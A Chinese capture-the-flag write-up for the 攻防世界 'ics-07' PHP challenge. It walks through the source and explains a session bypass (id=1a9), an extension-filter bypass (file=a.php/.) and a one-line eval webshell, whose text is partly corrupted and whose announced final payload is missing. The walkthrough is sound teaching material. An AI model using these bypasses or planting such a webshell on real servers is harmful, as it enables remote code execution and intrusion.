攻防世界----ics-07

拿到题目后，一个一个点开

直接拿到了源码，源码中php部分分成三个

第一部分，判断有没有page这个参数

<?php
    session_start();

    if (!isset($_GET[page])) {
      show_source(__FILE__);
      die();
    }//没有的话进入函数，展示文件，然后进程结束

    if (isset($_GET[page]) && $_GET[page] != 'index.php') {
      include('flag.php');
    }else {//如果page有值，并且值等于index.php，就进行else的函数中，重定向到了flag.php页面
      header('Location: ?page=flag.php');
    }

    ?>

//从总体上看，这一部分要求传入一个page参数，只要这个page参数不为index.php即可

 第二部分，如果session有值的话，就可以传入两个参数

<?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;//file会拼接到filename下

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
//对filename进行正则过滤，过滤条件为 . 就是除了换行符外的所有字符，+就是前面一个字符出现任意次
// \. 就是匹配.
// p[3457]?说明 p3,p,p4,p5,p7出现0或一次， 
//整体来说，就是匹配以 .php,.php3,.php4,.php5,.php7,.pht,.phtml 结尾的值
          die("Bad file extension");
       }else{
            chdir('uploaded');//切换目录到 uploaded
           $f = fopen($filename, 'w'); //以w方式打开文件，如果这个文件存在，就删掉，不存在就创建
           fwrite($f, $con);//$f是文件，$con是写进去的内容
           fclose($f);
       }
     }
     ?>

//整体来说，就是过正则，写一句话木马
//因为那个正则匹配了所有.php结尾的文件，因此我们需要用到解析漏洞

第三部分，实现第二部分的关键，就是在于session是有值的，第三部分是给session赋值的

<?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {//通过get方式传入id，这个id需要满足不等1，并且结尾是9，那就1a9,1*9,只要不是正常的数字就行
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);//将传入的id进行字符串解析，防止了sql注入
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);//查询数据库
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){//如果上面result有值的话，session就是true，能够进入第二部分
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

结合上面三个部分，总结就是

1.传入一个page参数，page只要不是等于index.php就好

2.在session为true的情况下，因为没有对con进行过滤，那con直接等于一句话木马即可即

con=<[email protected]($_POST['666']);?>

因为对file进行过滤了，所以file需要用到解析漏洞的知识点,file=a.php/.

3.为了满足if的判断，id的值不能为一个正常的整数，需要这样：1a9,1iii9,只要1和9之间有东西（并且不能为一个正常的整数，如199）即可

最后的payload如下

这里需要注意一下url，在第二部分中有一个chdir()的函数，这个函数的作用是切换目录

chdir(uploaded)就是切换目录到uploaded，而filename= backup/1.php

所以地址不是 /backup/1.php而是 uploaded/backup/1.php